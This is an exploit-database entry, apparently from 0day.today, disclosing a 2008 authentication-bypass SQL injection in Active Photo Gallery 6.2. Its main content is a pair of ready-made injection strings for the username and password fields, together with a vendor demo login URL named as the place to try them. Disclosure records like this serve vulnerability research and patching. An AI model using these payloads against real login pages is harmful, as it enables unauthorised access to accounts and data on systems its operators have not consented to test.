id: 4318
date: 11/30/2008
title: Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

==================================================================
Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability
==================================================================


[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor:www.activewebsoftwares.com
   
 [~]Software: Active Photo Gallery v 6.2
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
   
 [~] Exploit:
   
  username: r0' or ' 1=1--
  password: r0' or ' 1=1--
   
   
 [~]login 4 d3m0:
   
  http://www.activewebsoftwares.com/demoactivephotogallery/account.asp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-25]  #